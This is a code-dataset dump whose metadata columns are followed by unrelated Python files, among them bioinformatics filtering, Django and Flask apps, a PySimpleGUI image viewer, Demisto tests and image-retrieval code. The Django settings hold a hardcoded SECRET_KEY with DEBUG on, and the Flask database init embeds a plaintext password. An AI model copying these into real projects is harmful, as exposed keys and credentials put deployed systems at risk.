blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a67ab25d1cff271512c54db3bd1399b8a02b7f04 | f69c3d3affa917b14fb182871ad580f09f1ffd30 | /scripts/filterSAMV3.py | 0ce06ef5dadac8bda5b24cea98afa2e31485d57c | [] | no_license | jxmavs/MPRAu | b41e8a1b1c5253c319369281adf9b4ac18122999 | 1addfb04be5c3e6c6199274593b94df66120056b | refs/heads/main | 2023-04-12T23:37:34.049570 | 2021-10-07T13:42:14 | 2021-10-07T13:42:14 | 402,938,693 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,399 | py | ## 06/14/16
##
## Dustin Griesemer
##
## filterSAM.py -inputF SAM_input_path -passF pass_reads_path -failF fail_reads_path
## Example: python /home/unix/dusting/src/MPRA/seq/filterSAM.py -inputF /idi/sabeti-data/dustin/sequencing/HLBCXX/BWA/Bmt1_CTGCGGAT.merged.trimmed_seqxN_M_qF_md.sam -passF /idi/sabeti-data/dustin/sequencing/HLBCXX/BWA/Bmt1_CTGCGGAT.merged.trimmed_seqxN_M_qF_md_filtered.sam -failF /idi/sabeti-data/dustin/sequencing/HLBCXX/BWA/Bmt1_CTGCGGAT.merged.trimmed_seqxN_M_qF_md_failed.sam
##
## Filter SAM file for read homology
##
import sys
import argparse
import re
parser = argparse.ArgumentParser()
parser.add_argument('-inputF')
parser.add_argument('-passF')
parser.add_argument('-failF')
parser.add_argument('-infoF')
parser.add_argument('-s')
parsed = parser.parse_args()
input_file=open(parsed.inputF,'r')
info_file=open(parsed.infoF,'r')
pass_file=open(parsed.passF,'w')
fail_file=open(parsed.failF,'w')
length={}
for line in info_file:
if line[0]=='#':
continue
vals=line.strip().split('\t')
seqID=vals[0]
seq_length=vals[4]
length[seqID]=int(seq_length)
num_pass_homology_filter=0
num_fail_homology_filter=0
for line in input_file:
if line[0]=='@':
pass_file.write(line)
fail_file.write(line)
continue
vals=line.strip().split('\t')
seqID=vals[2]
seq_length=length[seqID]
MD_tag=vals[12].split(':')[-1]
MD_vals=re.findall('[0-9]+|\^[A-Z]+|[A-Z]+',MD_tag)
match_count=0
mismatch_count=0
for entry in MD_vals:
if entry=='':
continue
try:
match_count=match_count+int(entry)
except ValueError:
if entry[0]=='^':
entry=entry[1:]
mismatch_count=mismatch_count+len(entry)
MD_length=match_count+mismatch_count
MD_max=min(seq_length,123) #only 123bp can be read at most
if MD_length>MD_max:
percent_match=(float(MD_max)-float(mismatch_count))/float(MD_max)
else:
percent_match=float(match_count)/float(MD_max)
if percent_match>0.95:
num_pass_homology_filter+=1
pass_file.write(line)
else:
num_fail_homology_filter+=1
fail_file.write(line)
with open(parsed.s, "w") as out_stats_file:
out_stats_file.write("Num_Pass_Filter\tNum_Fail_Filter\n")
out_stats_file.write("{0}\t{1}\n".format(num_pass_homology_filter, num_fail_homology_filter))
| [
"[email protected]"
] | |
86b67e3907137062b76bca97e81c8f8bf1db5ef8 | 0f5aa7e116cce3355323bcf0c4af4afdb611de7a | /jobs/views.py | a863637ec63843af6ae2094962b3176865d402b0 | [] | no_license | fyangtx/portfolio-project | d95476aef7873530158ca6d139815c4532b03b38 | 20b0f8bdddaaeb112c90171273a7b72e36abe346 | refs/heads/master | 2020-08-29T15:35:11.318543 | 2019-11-05T15:54:08 | 2019-11-05T15:54:08 | 218,076,377 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 299 | py | from django.shortcuts import render
from .models import Job
# Create your views here.
def home(request):
jobs = Job.objects
return render(request, 'jobs/home.html', {'jobs':jobs})
def Blog(request):
jobs = Job.objects
return render(request, 'blog/allblogs.html', {'blog':jobs}) | [
"[email protected]"
] | |
5e1a362c581d3613061ed91b6c4f18a833599518 | 08238a7176a32e64e530475890cf71698ff852af | /img_veiwer.py | 73217b6f551364a0dd0fb8e8bd671da7a618e730 | [] | no_license | Aleks4920/Image-Veiwer | a513ba4d6d608a99f4ee0513e0c0f9f739ae62c4 | cc909adaf58f0ffa72d63c318217970cb77d5fe4 | refs/heads/main | 2023-04-26T12:34:16.202000 | 2021-05-17T20:22:57 | 2021-05-17T20:22:57 | 368,312,624 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,503 | py |
import PySimpleGUI as sg
import os.path
file_list_column = [
[
sg.Text("Image Folder"),
sg.In(size=(25,1), enable_events=True, key="-FOLDER-"),
sg.FolderBrowse()
],
[
sg.Listbox(
values=[], enable_events=True,size=(40,20), key="-FILE LIST-"
)
]
]
image_veiwer_column = [
[sg.Text("choose and Image")],
[sg.Text(size=(40,10), key="-TOUT-")],
[sg.Image(key="-IMAGE-")]
]
layout = [
[
sg.Column(file_list_column),
sg.VSeperator(),
sg.Column(image_veiwer_column)
]
]
window= sg.Window("Image Veiwer", layout)
while True:
event, values = window.read()
if event =="Exit" or event == sg.WIN_CLOSED:
break
if event == "-FOLDER-":
folder = values["-FOLDER-"]
try:
file_list = os.listdir(folder)
except:
file_list =[]
fnames = [
f
for f in file_list
if os.path.isfile(os.path.join(folder, f))
and f.lower().endswith((".png",".gif"))
]
window["-FILE LIST-"].update(fnames)
elif event == "-FILE LIST-":
try:
filename=os.path.join(values["-FOLDER-"], values["-FILE LIST-"][0])
window["-TOUT-"].update(filename)
window["-IMAGE-"].update(filename=filename)
print(window["-IMAGE-"].get_size())
except:
pass
window.close()
| [
"[email protected]"
] | |
4b4b9d026fc0998ae40065e2c06a01f29db173ea | a37c48267bfb8476476dad7219c4e3329f9e2991 | /Packs/Campaign/Scripts/GetCampaignIncidentsInfo/GetCampainIncidentsInfo_test.py | 46ac2acb649901554594372f906ad2bd66320db4 | [
"MIT"
] | permissive | adambaumeister/content | 611ce9fba412a5eb28fbefa8a43282e98d3f9327 | 01b57f8c658c2faed047313d3034e8052ffa83ce | refs/heads/master | 2023-03-09T18:16:18.623380 | 2022-07-13T18:11:09 | 2022-07-13T18:11:09 | 274,290,989 | 2 | 0 | MIT | 2023-03-06T12:22:17 | 2020-06-23T02:36:53 | Python | UTF-8 | Python | false | false | 5,072 | py | from CommonServerPython import *
from GetCampaignIncidentsInfo import *
REQUIRED_KEYS = ['id', 'name', 'emailfrom', 'recipients', 'severity', 'status', 'created']
STR_VAL_KEYS = ['name', 'emailfrom', 'recipients', 'created']
NUM_OF_INCIDENTS = 5
MOCKED_INCIDENTS = [
{key.replace('_', ''): f'test_{key}_{i}' if key in STR_VAL_KEYS else i for key in REQUIRED_KEYS}
for i in range(NUM_OF_INCIDENTS)
]
UPDATED_MOCKED_INCIDENTS = [
{key.replace('_', ''): 3 if key in KEYS_FETCHED_BY_QUERY else i for key in REQUIRED_KEYS}
for i in range(NUM_OF_INCIDENTS)
]
SOME_ERROR = 'Raised by mock of demisto.context'
def raise_exception():
raise Exception(SOME_ERROR)
def test_incidents_info_md_happy_path(mocker):
"""
Given:
- Mocked incidents
When:
- Get the campaign incidents info
Then:
- Validate all required key and val are in the MD result
"""
# prepare
mocker.patch('GetCampaignIncidentsInfo.update_incident_with_required_keys')
mocker.patch('GetCampaignIncidentsInfo.get_campaign_incidents_from_context', return_value=MOCKED_INCIDENTS)
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'incidents', return_value=MOCKED_INCIDENTS)
mocker.patch.object(demisto, 'executeCommand')
mocker.patch.object(demisto, 'context', return_value={'EmailCampaign': {'fieldsToDisplay': REQUIRED_KEYS}})
# run
main()
hr = demisto.results.call_args[0][0]['HumanReadable']
# validate required keys are header in the MD and the expected values are the table
assert all(string_to_table_header(key) in hr for key in REQUIRED_KEYS)
assert all(f'test_{key}_' in hr for key in STR_VAL_KEYS)
assert all(status in hr for status in STATUS_DICT.values())
assert all(f'[{i}](#/Details/{i})' in hr for i in range(NUM_OF_INCIDENTS)) # linkable incident id
# validate the call to update empty fields
args = demisto.executeCommand.call_args[0][1]
assert args['customFields'] == DEFAULT_CUSTOM_FIELDS
def test_incidents_info_md_for_empty_context(mocker):
"""
Given:
- There is no campaign incidents in context
When:
- Get the campaign incidents info
Then:
- Validate return message
"""
# prepare
mocker.patch.object(demisto, 'results')
mocker.patch('GetCampaignIncidentsInfo.get_campaign_incidents_from_context', return_value=[])
# run
main()
# validate
assert demisto.results.call_args[0][0]['HumanReadable'] == NO_CAMPAIGN_INCIDENTS_MSG
def test_incidents_info_md_with_invalid_keys(mocker):
"""
Given:
- Incidents in campaign context contains some invalid keys (e.g. status),
When:
- Get value from incident (GetCampaignIncidentsInfo.get_incident_val)
Then:
- Validate invalid key not in the human readable
"""
# prepare
incident_with_invalid_status = MOCKED_INCIDENTS[4]
incident_without_status = MOCKED_INCIDENTS[0].copy()
incident_without_status.pop('status')
incidents = [incident_with_invalid_status, incident_without_status]
mocker.patch.object(demisto, 'results')
mocker.patch('GetCampaignIncidentsInfo.get_campaign_incidents_from_context', return_value=incidents)
mocker.patch('GetCampaignIncidentsInfo.update_incident_with_required_keys', return_value=incidents)
# run
main()
hr = demisto.results.call_args[0][0]['HumanReadable']
# validate
assert 'Status' not in hr
assert all(status not in hr for status in STATUS_DICT.values())
def test_some_error(mocker):
"""
Given:
- Dynamic section try to populate the MD from script
When:
- Get incident info
Then:
- Raise exception and validate the return_error is called
"""
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'context', side_effect=raise_exception)
mocker.patch('GetCampaignIncidentsInfo.update_incident_with_required_keys')
# run
try:
main()
assert False, 'SystemExit should occurred'
except SystemExit:
assert demisto.results.call_args[0][0]['Contents'] == SOME_ERROR
def test_updated_status_and_severity(mocker):
"""
Given -
Status or severity of incidents in campaign was changed
When -
Get the incidents info
Then -
Validate the updated values is returned
"""
# prepare
mocker.patch.object(demisto, 'results')
mocker.patch('GetCampaignIncidentsInfo.get_campaign_incidents_from_context', return_value=MOCKED_INCIDENTS)
mocker.patch.object(demisto,
'executeCommand',
return_value=[{'Contents': json.dumps(UPDATED_MOCKED_INCIDENTS), 'Type': 'str'}])
# run
main()
# validate
hr = demisto.results.call_args[0][0]['HumanReadable']
hr.count('| Archive |') == NUM_OF_INCIDENTS # all incidents should have the 'Archive' status
hr.count('| 3 |') == NUM_OF_INCIDENTS # all incidents should have severity 3
| [
"[email protected]"
] | |
1faa0fa35b3e9e7d37c51b9677b1ce5213485dc9 | 4bfa5e8925ce8170ec6d1c541979b956f2cdde61 | /src/edge.py | 521a0c869676ec15aa6bf4a37727ee28dc93dd72 | [] | no_license | YulongLee/2020DIGIX-AI--competition | 0d352b89c226fe78dad0c523d5524960154a8ac6 | d16020303c00a9179c9083fa4533305a9f1cb4f2 | refs/heads/master | 2022-12-01T00:30:16.928044 | 2020-08-21T03:18:46 | 2020-08-21T03:18:46 | 278,046,179 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,790 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
from src.evaluate import evaluate_class
from src.DB import Database
from six.moves import cPickle
import numpy as np
import scipy.misc
from math import sqrt
import os
stride = (1, 1)
n_slice = 10
h_type = 'region'
d_type = 'cosine'
depth = 5
''' MMAP
depth
depthNone, region-stride(1, 1)-n_slice10,co, MMAP 0.101670982288
depth100, region-stride(1, 1)-n_slice10,co, MMAP 0.207817305128
depth30, region-stride(1, 1)-n_slice10,co, MMAP 0.291715090839
depth10, region-stride(1, 1)-n_slice10,co, MMAP 0.353722379063
depth5, region-stride(1, 1)-n_slice10,co, MMAP 0.367119444444
depth3, region-stride(1, 1)-n_slice10,co, MMAP 0.3585
depth1, region-stride(1, 1)-n_slice10,co, MMAP 0.302
(exps below use depth=None)
d_type
global-stride(2, 2),d1, MMAP 0.0530993236031
global-stride(2, 2),co, MMAP 0.0528310744618
stride
region-stride(2, 2)-n_slice4,d1, MMAP 0.0736245142237
region-stride(1, 1)-n_slice4,d1, MMAP 0.0704206226545
n_slice
region-stride(1, 1)-n_slice10,co, MMAP 0.101670982288
region-stride(1, 1)-n_slice6,co, MMAP 0.0977736743859
h_type
global-stride(2, 2),d1, MMAP 0.0530993236031
region-stride(2, 2)-n_slice4,d1, MMAP 0.0736245142237
'''
edge_kernels = np.array([
[
# vertical
[1,-1],
[1,-1]
],
[
# horizontal
[1,1],
[-1,-1]
],
[
# 45 diagonal
[sqrt(2),0],
[0,-sqrt(2)]
],
[
# 135 diagnol
[0,sqrt(2)],
[-sqrt(2),0]
],
[
# non-directional
[2,-2],
[-2,2]
]
])
# cache dir
cache_dir = 'cache'
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
class Edge(object):
def histogram(self, input, stride=(2, 2), type=h_type, n_slice=n_slice, normalize=True):
''' count img histogram
arguments
input : a path to a image or a numpy.ndarray
stride : stride of edge kernel
type : 'global' means count the histogram for whole image
'region' means count the histogram for regions in images, then concatanate all of them
n_slice : work when type equals to 'region', height & width will equally sliced into N slices
normalize: normalize output histogram
return
type == 'global'
a numpy array with size len(edge_kernels)
type == 'region'
a numpy array with size len(edge_kernels) * n_slice * n_slice
'''
if isinstance(input, np.ndarray): # examinate input type
img = input.copy()
else:
img = scipy.misc.imread(input, mode='RGB')
height, width, channel = img.shape
if type == 'global':
hist = self._conv(img, stride=stride, kernels=edge_kernels)
elif type == 'region':
hist = np.zeros((n_slice, n_slice, edge_kernels.shape[0]))
h_silce = np.around(np.linspace(0, height, n_slice+1, endpoint=True)).astype(int)
w_slice = np.around(np.linspace(0, width, n_slice+1, endpoint=True)).astype(int)
for hs in range(len(h_silce)-1):
for ws in range(len(w_slice)-1):
img_r = img[h_silce[hs]:h_silce[hs+1], w_slice[ws]:w_slice[ws+1]] # slice img to regions
hist[hs][ws] = self._conv(img_r, stride=stride, kernels=edge_kernels)
if normalize:
hist /= np.sum(hist)
return hist.flatten()
def _conv(self, img, stride, kernels, normalize=True):
H, W, C = img.shape
conv_kernels = np.expand_dims(kernels, axis=3)
conv_kernels = np.tile(conv_kernels, (1, 1, 1, C))
assert list(conv_kernels.shape) == list(kernels.shape) + [C] # check kernels size
sh, sw = stride
kn, kh, kw, kc = conv_kernels.shape
hh = int((H - kh) / sh + 1)
ww = int((W - kw) / sw + 1)
hist = np.zeros(kn)
for idx, k in enumerate(conv_kernels):
for h in range(hh):
hs = int(h*sh)
he = int(h*sh + kh)
for w in range(ww):
ws = w*sw
we = w*sw + kw
hist[idx] += np.sum(img[hs:he, ws:we] * k) # element-wise product
if normalize:
hist /= np.sum(hist)
return hist
def make_samples(self, db, verbose=True):
if h_type == 'global':
sample_cache = "edge-{}-stride{}".format(h_type, stride)
elif h_type == 'region':
sample_cache = "edge-{}-stride{}-n_slice{}".format(h_type, stride, n_slice)
try:
samples = cPickle.load(open(os.path.join(cache_dir, sample_cache), "rb", True))
for sample in samples:
sample['hist'] /= np.sum(sample['hist']) # normalize
if verbose:
print("Using cache..., config=%s, distance=%s, depth=%s" % (sample_cache, d_type, depth))
except:
if verbose:
print("Counting histogram..., config=%s, distance=%s, depth=%s" % (sample_cache, d_type, depth))
samples = []
data = db.get_data()
for d in data.itertuples():
d_img, d_cls = getattr(d, "img"), getattr(d, "cls")
d_hist = self.histogram(d_img, type=h_type, n_slice=n_slice)
samples.append({
'img': d_img,
'cls': d_cls,
'hist': d_hist
})
cPickle.dump(samples, open(os.path.join(cache_dir, sample_cache), "wb", True))
return samples
if __name__ == "__main__":
db = Database()
# check shape
assert edge_kernels.shape == (5, 2, 2)
# evaluate database
APs = evaluate_class(db, f_class=Edge, d_type=d_type, depth=depth)
cls_MAPs = []
for cls, cls_APs in APs.items():
MAP = np.mean(cls_APs)
print("Class {}, MAP {}".format(cls, MAP))
cls_MAPs.append(MAP)
print("MMAP", np.mean(cls_MAPs))
| [
"[email protected]"
] | |
8090a4e5189527c60262b8d9d937fbb1737c4657 | b6e9021fcb19ed217223c97c85228d8042294a84 | /ispyb/__init__.py | 999ddb0a03049d9d658968b903bbe481e33fef2a | [
"Apache-2.0"
] | permissive | drnasmith/flask-ispyb-admin | 28c4eb10808dd1f1716790ff5e7b56d37e34e38a | eebf7ee9489e22265aa7cd23263a3bb74efa9a86 | refs/heads/master | 2020-03-27T18:19:58.102151 | 2019-05-02T16:28:25 | 2019-05-02T16:28:25 | 146,915,423 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 958 | py | from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.engine.url import URL
db = SQLAlchemy()
Base = db.Model
# Use config module if provided:
# db_config = {
# 'user' : 'dbuser',
# 'password' : 'dbpassword',
# 'host' : 'localhost',
# 'port' : '3306',
# 'name' : 'test_db',
# }
try:
from config import db_config
db_url = URL(drivername='mysql+mysqlconnector',
username=db_config.get('user'),
password=db_config.get('password'),
host=db_config.get('host'),
port=db_config.get('port'),
database=db_config.get('name'))
except ImportError:
db_url = 'mysql+mysqlconnector://ispyb:[email protected]:3306/ispyb'
def init_app(app):
"""
Initialise the database connection and flask-sqlalchemy
"""
print("Using database connection URL: {}".format(db_url))
app.config['SQLALCHEMY_DATABASE_URI'] = db_url
db.init_app(app)
| [
"[email protected]"
] | |
84347b78c681428ae4be6f35bdd6d5c0459ac5e8 | c87d20ea41308a529d0eec9bc61558f9183d9db4 | /mysite/settings.py | 04e6e9f88f9d8b073648af0778f0fd2cb1f7d306 | [] | no_license | cdelfierro/my-first-blog | 202213a48141b2968c72346a55d5a55b335873fb | fc057ade96c90754c7b1d08fa1b558dc8b695baf | refs/heads/master | 2021-01-22T23:07:30.701625 | 2017-06-14T21:33:36 | 2017-06-14T21:33:36 | 92,801,358 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,241 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.10.7.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '4@-s**^@6tx7i83wpt*)ygw1kv&25$c5==h(ap15mxp7ivg(&!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', 'localhost', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Santiago'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
LOGIN_REDIRECT_URL = '/'
| [
"[email protected]"
] | |
72376f0ec9e98440ff93c68f5fa084abf1c07fb8 | 7b5c1352e1a4fb8352161cc135bfd1225a633828 | /2017-cvr-tencent-final/src/feature_engineer/user_action_app_sum.py | 14c643cb1eba6e524f852a2ad225fbe7be054f30 | [] | no_license | zgcgreat/2017-cvr-tencent | b7f54ae8df55fbb30f2430f695a148844982aa3a | fe79d0756bbf862d45e63e35b7c28da8396bcbda | refs/heads/master | 2021-04-03T08:32:33.651705 | 2018-07-17T08:36:53 | 2018-07-17T08:36:53 | 124,724,199 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 3,620 | py | '''
当天之前用户安装的app数量,不加前16天的统计和加上前16天的统计
'''
import collections
from csv import DictReader
user_app_install_sum = {}
for row in DictReader(open('../../output/feature_data/installed_app_cnt.csv', 'r')):
user_app_install_sum[row['userID']] = row['installed_app_cnt']
user_app_sum = {}
for cur_date in range(24, 32):
user_app_sum[str(cur_date)] = collections.defaultdict(lambda: 0)
for row in DictReader(open('../../data_ori/user_app_actions.csv', 'r')):
date = int(row['installTime'][:2])
if date < cur_date:
user_app_sum[str(cur_date)][row['userID']] += 1
print(cur_date)
print(user_app_sum['24'])
print('train set...')
with open('../../output/feature_data/tr_user_app_sum.csv', 'w') as fo:
fo.write('label,clickTime,userID,user_app_action_sum,user_app_action_installed_sum\n')
for row in DictReader(open('../../data/train.csv', 'r')):
date = int(row['date'])
userID = row['userID']
# app_action_count = 0 # 从第17天开始, 到当天前一天用户安装app的数量
# app_action_installed_count = 0 # 前16天用户安装app的数量 + 从第17天开始, 到当天前一天用户安装app的数量
if 28 <= date <= 29:
if userID in user_app_sum[str(date)].keys():
app_action_count = user_app_sum[str(date)][userID] # 从第17天开始, 到当天前一天用户安装app的数量
else:
app_action_count = 0
if userID in user_app_install_sum.keys():
app_installed_count = int(user_app_install_sum[userID]) # 前16天用户安装app的数量
else:
app_installed_count = 0
app_action_installed_count = app_action_count + app_installed_count # 前16天用户安装app的数量 + 从第17天开始, 到当天前一天用户安装app的数量
if app_action_count == 0:
app_action_count = -1
if app_installed_count == 0:
app_installed_count = -1
if app_action_installed_count == 0:
app_action_installed_count = -1
fo.write(row['label'] + ',' + row['date'] + ',' + userID + ',' + str(app_action_count) + ',' +
str(app_action_installed_count) + '\n')
print('test set...')
with open('../../output/feature_data/te_user_app_sum.csv', 'w') as fo:
fo.write('label,clickTime,userID,user_app_action_sum,user_app_action_installed_sum\n')
for row in DictReader(open('../../data/test.csv', 'r')):
date = int(row['date'])
userID = row['userID']
app_action_count = 0
app_action_installed_count = 0
if date == 31:
if userID in user_app_sum[str(date)].keys():
app_action_count = user_app_sum[str(date)][userID]
else:
app_action_count = 0
if userID in user_app_install_sum.keys():
app_installed_count = int(user_app_install_sum[userID])
else:
app_installed_count = 0
app_action_installed_count = app_action_count + app_installed_count
if app_action_count == 0:
app_action_count = -1
if app_installed_count == 0:
app_installed_count = -1
if app_action_installed_count == 0:
app_action_installed_count = -1
fo.write(row['label'] + ',' + row['date'] + ',' + userID + ',' + str(app_action_count) + ',' +
str(app_action_installed_count) + '\n')
| [
"[email protected]"
] | |
c108babea4c40d55a532433761d77eb3ceaab12c | c42430ef0d99f1cf97cf91c6279b647c2166c4c4 | /app/transaction/salary_sheet.py | d1933d7c93e39ef27f90aaca38c2d8d22b95b16b | [
"MIT"
] | permissive | vaibhavantil/Hafta | 15583a0fc7f4325ddce84463526372b12ac7f73f | f47d1c64ba7b3e0a8f04afe2365d1524bdc2b27d | refs/heads/master | 2023-04-02T12:34:15.463850 | 2021-03-02T19:33:21 | 2021-03-02T19:33:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,430 | py | # Salary Sheet
from flask import Blueprint
from flask import render_template, redirect, url_for, request, session, jsonify
from flask_login import login_user, logout_user, current_user
from app.transaction import bp
from app.employee.model import Employee, EmployeeAdvanceSchema
from app.master.model import Company, AttendenceRules
from app.transaction.model_att import Attendence, AttendenceSchema
from app.transaction.model_adv import Advance, AdvanceSchema
from app.transaction.model_sal import SalarySheet, SalarySheetSlips
from app import db, ma
from datetime import datetime
import requests
import json
@bp.route('/salary_sheet/', methods=['GET'])
def show_sheet():
return render_template('transaction/salary_sheet.html')
@bp.route('/salary_sheet/print/all', methods=['GET', 'POST'])
def print_salatry_sheet_company():
return render_template('reports/print_sheet.html')
@bp.route('/salary_sheet/delete/<id>', methods=['GET', 'POST'])
def delete_salatry_sheet_company(id):
data = SalarySheet.query.filter_by(id=int(id))
try:
data.delete()
db.session.commit()
return jsonify({'success' : 'Deleted'})
except Exception as e:
return jsonify({'message' : 'Somethign went wrong' + str(e)})
@bp.route('/salary_sheet/print/selected', methods=['GET', 'POST'])
def print_salatry_sheet_selected():
return render_template('reports/print_sheet_selected.html')
@bp.route('/salary_sheet/slips', methods=['POST'])
def salary_slips_emp():
# Needs none checks
payload = request.json
if payload is not None:
payload_date = payload['date'].split('-')
payload_date = datetime(
int(payload_date[0]), int(payload_date[1]), int(1))
emp_id = payload['emp_id']
json_schema = AttendenceSchema()
emp_att = Attendence.query.filter(Attendence.employee.any(
Employee.id == int(emp_id)), Attendence.date == payload_date).first()
slips = SalarySheetSlips.query.filter(SalarySheetSlips.employee.any(
Employee.id == int(emp_id)), SalarySheetSlips.date == payload_date).first()
if slips is not None and emp_att is not None:
json_data = json.loads(json_schema.dumps(emp_att))
att_rules = AttendenceRules.query.first()
late_comin_ratio = float(
att_rules.late_comin_day / att_rules.late_comin)
early_going_ratio = float(
att_rules.early_going_day / att_rules.early_going)
json_data['net_adv_deduction'] = slips.adv_deduction
json_data['days_payable_late'] = late_comin_ratio * \
json_data['latecomin']
json_data['days_payable_early'] = early_going_ratio * \
json_data['earlygoing']
json_data['days_payable'] = round(
json_data['daysatt'] - (json_data['days_payable_late'] + json_data['days_payable_early']), 2)
json_data['pay_1'] = float(
json_data['days_payable']) * (float(json_data['employee'][0]['basicpay']) / 30)
if json_data['esi'] is None:
json_data['esi'] = 0
if json_data['tds'] is None:
json_data['tds'] = 0
if json_data['pf'] is None:
json_data['pf'] = 0
if json_data['other_deduction'] is None:
json_data['other_deduction'] = 0
json_data['total_deductions'] = float(json_data['esi']) + float(json_data['pf']) + float(
json_data['tds']) + float(json_data['other_deduction']) + float(json_data['net_adv_deduction'])
json_data['net_payable'] = float(
json_data['pay_1'] - json_data['total_deductions'])
return jsonify({'success': json_data})
else:
return jsonify({'message': 'Data not present'})
else:
return jsonify({'message': 'Empty data recieved.'})
@bp.route('/salary_sheet/slips/range', methods=['POST'])
def salary_slips_emp_range():
# Needs none checks
payload = request.json
if payload is not None:
payload_start_date = payload['start_date'].split('-')
payload_start_date = datetime(
int(payload_start_date[0]), int(payload_start_date[1]), int(1))
payload_end_date = payload['end_date'].split('-')
payload_end_date = datetime(
int(payload_end_date[0]), int(payload_end_date[1]), int(1))
emp_id = payload['emp_id']
json_schema = AttendenceSchema()
emp_att = Attendence.query.filter(Attendence.employee.any(
Employee.id == int(emp_id)), Attendence.date >= payload_start_date , Attendence.date <= payload_end_date).all()
slips = SalarySheetSlips.query.filter(SalarySheetSlips.employee.any(
Employee.id == int(emp_id)), SalarySheetSlips.date >= payload_start_date , SalarySheetSlips.date <= payload_end_date ).all()
print(slips)
att_rules = AttendenceRules.query.first()
late_comin_ratio = float(
att_rules.late_comin_day / att_rules.late_comin)
early_going_ratio = float(
att_rules.early_going_day / att_rules.early_going)
all_data = []
for slip, att in zip(slips , emp_att):
json_data = json.loads(json_schema.dumps(att))
json_data['net_adv_deduction'] = slip.adv_deduction
json_data['days_payable_late'] = late_comin_ratio * \
json_data['latecomin']
json_data['days_payable_early'] = early_going_ratio * \
json_data['earlygoing']
json_data['days_payable'] = round(
json_data['daysatt'] - (json_data['days_payable_late'] + json_data['days_payable_early']), 2)
json_data['pay_1'] = float(
json_data['days_payable']) * (float(json_data['employee'][0]['basicpay']) / 30)
if json_data['esi'] is None:
json_data['esi'] = 0
if json_data['tds'] is None:
json_data['tds'] = 0
if json_data['pf'] is None:
json_data['pf'] = 0
if json_data['other_deduction'] is None:
json_data['other_deduction'] = 0
json_data['total_deductions'] = float(json_data['esi']) + float(json_data['pf']) + float(
json_data['tds']) + float(json_data['other_deduction']) + float(json_data['net_adv_deduction'])
json_data['net_payable'] = float(
json_data['pay_1'] - json_data['total_deductions'])
print(json_data['net_payable'])
all_data.append(json_data)
return jsonify({'success': all_data})
else:
return jsonify({'message': 'Data not present'})
